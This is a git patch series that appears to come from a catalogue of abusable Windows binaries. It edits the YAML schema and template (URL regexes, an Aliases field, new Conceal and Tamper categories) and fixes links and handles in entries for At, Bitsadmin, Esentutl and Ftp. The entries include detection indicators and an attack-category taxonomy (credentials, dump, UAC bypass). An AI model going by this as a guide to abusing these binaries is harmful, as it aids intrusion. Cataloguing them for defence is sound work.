93cd402447f998b7fc3ec2217ffa41a78a3485f2..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12288 zcmeI2&yU+g6vt=bNGqx$aYK55s$6hvC+U*4_?0G98!6d@WJ8OHWR2}{GK%eSXU6O1 zLeKmG@IP?jPvF9(`~mz0h!b}%po(WFtEP*pMdAdSk-i#b-piYr&wF!-@&f1c;TXEj z7Qu0gknhjl3V;0i_R+JauaZz?LRRb73`u#!{(<9HbwIlma>KKgJ(`T}_2&D@a_w!J z*pvA^o>9q}vU_D_nUhBt06UhZ!! zhJYbp2p9r}fFWQA7y^cXA@IK=pz|a01aI}q{$_9P=c6n0{-c=;0YktLFa!(%L%=?&u$X(GwKJ_ zcc^bs7pM*D_Zx)#hWZjUMcqLCfw6zt@A0(S#|%Tj5HJJ`0YktLFa!(%L%SI6S`dUaKp9@0${B0AaFdBLVbO}EEYn`?IO5sHgSFPV z@@!j|Tx)E<4Ml1{4{2jpt}c}Aw%hF!$8p>5x7w|{sN)WqF(nEaGPMgg=c|-HkGJA_ zT?BQw+H(4tttt;YNJL-8 zmpqF^sq83I{-c7)ZMEV@k9>?pl~41WztBHCV48)RBZeIks@ER$z2#Jjm82=$=NNVQ zU>6m;kJWO_Ln)Mqb#uVfMvMHgC)szKuG_?WyG_S`eBAN+$| zu;se)>r>5ELT)`6h%!qA{-Udv(H>HT#c;U_F@6?wDR9bY%I;Jw2UOGLNQ5+5PIqCh%g>c`^q0dkru#Hp zv*ib~-q~O>wz^jTv^TQ`!`Y|(^U3UskC2E3eUYYkDi5&ErG`{l^q`jTS$w>!@eePb zNlr0?0nh5fmbA2Ww4JZZQAzfp@HO-$!$e`wM$2hAmfNzNR)h2ky%rJ|4<2TNypWP} vAre3oQB8Ue6AMRVAmS=v5AE@M_z>`n2@h+70yG|!(-}ha{+3%}Sr+*V_JpM> From 9515d4330105229b1128339591df910f403d01f5 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Tue, 13 Sep 2022 22:58:12 -0400 Subject: [PATCH 56/60] Attempting to fixe regex --- YML-Schema.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/YML-Schema.yml b/YML-Schema.yml index 363b279..2188b68 100644 --- a/YML-Schema.yml +++ b/YML-Schema.yml @@ -74,19 +74,19 @@ mapping: type: str "Sigma": type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Analysis": type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Elastic": type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Splunk": type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "BlockRule": type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Resources": type: seq required: false @@ -95,7 +95,7 @@ mapping: mapping: "Link": type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Acknowledgement": type: seq required: false From ee68df7f26acdc636cdab770b314d965a3426efc Mon Sep 17 00:00:00 2001 From: xenoscr Date: Tue, 13 Sep 2022 23:06:42 -0400 Subject: [PATCH 57/60] Put schema back to previous state and fixed non-compliant Link in At.yml --- YML-Schema.yml | 12 ++++++------ yml/OSBinaries/At.yml | 2 +- 2 files changed, 7 insertions(+), 7 deletions(-) diff --git a/YML-Schema.yml b/YML-Schema.yml index 2188b68..363b279 100644 --- a/YML-Schema.yml +++ b/YML-Schema.yml @@ -74,19 +74,19 @@ mapping: type: str "Sigma": type: str - pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Analysis": type: str - pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Elastic": type: str - pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Splunk": type: str - pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "BlockRule": type: str - pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Resources": type: seq required: false @@ -95,7 +95,7 @@ mapping: mapping: "Link": type: str - pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Acknowledgement": type: seq required: false diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index 245153c..30df729 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml @@ -23,7 +23,7 @@ Detection: - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. Resources: - Link: https://freddiebarrsmith.com/at.txt - - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator + - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems Acknowledgement: - Person: 'Freddie Barr-Smith' From dfb30f194f8a9c21d34d58526a54683209e035ba Mon Sep 17 00:00:00 2001 From: xenoscr Date: Tue, 13 Sep 2022 23:37:10 -0400 Subject: [PATCH 58/60] Tweaked the Link regex to allow anchor tags and the handle regex to permit blank entries. --- YML-Schema.yml | 14 +++++++------- yml/OSBinaries/Bitsadmin.yml | 2 +- yml/OSBinaries/Esentutl.yml | 2 +- yml/OSBinaries/Ftp.yml | 2 +- 4 files changed, 10 insertions(+), 10 deletions(-) diff --git a/YML-Schema.yml b/YML-Schema.yml index 363b279..11f3409 100644 --- a/YML-Schema.yml +++ b/YML-Schema.yml @@ -74,19 +74,19 @@ mapping: type: str "Sigma": type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Analysis": type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Elastic": type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Splunk": type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "BlockRule": type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Resources": type: seq required: false @@ -95,7 +95,7 @@ mapping: mapping: "Link": type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Acknowledgement": type: seq required: false @@ -106,4 +106,4 @@ mapping: type: str "Handle": type: str - pattern: '^@(\w){1,15}$' + pattern: '^(@(\w){1,15})?$' diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index 01a868b..a6f9a94 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ b/yml/OSBinaries/Bitsadmin.yml @@ -46,7 +46,7 @@ Detection: - IOC: bitsadmin creates new files - IOC: bitsadmin adds data to alternate data stream Resources: - - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53 + - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement: diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index 22a9279..21554b2 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml @@ -66,4 +66,4 @@ Acknowledgement: - Person: egre55 Handle: '@egre55' - Person: Mike Cary - Handle: 'grayfold3d' + Handle: '@grayfold3d' diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index 0b86026..6293171 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml @@ -37,4 +37,4 @@ Acknowledgement: - Person: BennyHusted Handle: '' - Person: Amit Serper - Handle: '@0xAmit ' + Handle: '@0xAmit' From e37d01107b4c0ec71553d5f2e8fec25ca71e9b1c Mon Sep 17 00:00:00 2001 From: xenoscr Date: Thu, 15 Sep 2022 13:36:30 -0400 Subject: [PATCH 59/60] Adding Coneal & Tamper categories to template and Schema. --- YML-Schema.yml | 11 ++++++++++- YML-Template.yml | 2 ++ 2 files changed, 12 insertions(+), 1 deletion(-) diff --git a/YML-Schema.yml b/YML-Schema.yml index 11f3409..f1256f4 100644 --- a/YML-Schema.yml +++ b/YML-Schema.yml @@ -12,6 +12,15 @@ mapping: "Description": type: str required: true + "Aliases": + type: seq + required: false + sequence: + - type: map + mapping: + "Alias": + type: str + required: false "Author": type: str required: true @@ -36,7 +45,7 @@ mapping: "Category": type: str required: true - enum: [ADS, AWL Bypass, Compile, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, UAC Bypass, Upload] + enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload] "Privileges": type: str required: true diff --git a/YML-Template.yml b/YML-Template.yml index 8556fd6..ea4a2ac 100644 --- a/YML-Template.yml +++ b/YML-Template.yml @@ -6,6 +6,8 @@ Created: YYYY-MM-DD (date the person created this file) Commands: - Command: The command Description: Description of the command + Aliases: + - An alias for the command (example: ProcDump.exe & ProcDump64.exe) Usecase: A description of the usecase Category: Execute Privileges: Required privs From 033598bc77b3470d5ffabcbc6bafa72c718063c5 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Thu, 15 Sep 2022 13:44:18 -0400 Subject: [PATCH 60/60] Fixing indentation in YML-Schema.yml --- YML-Schema.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/YML-Schema.yml b/YML-Schema.yml index f1256f4..dc3f775 100644 --- a/YML-Schema.yml +++ b/YML-Schema.yml @@ -19,8 +19,8 @@ mapping: - type: map mapping: "Alias": - type: str - required: false + type: str + required: false "Author": type: str required: true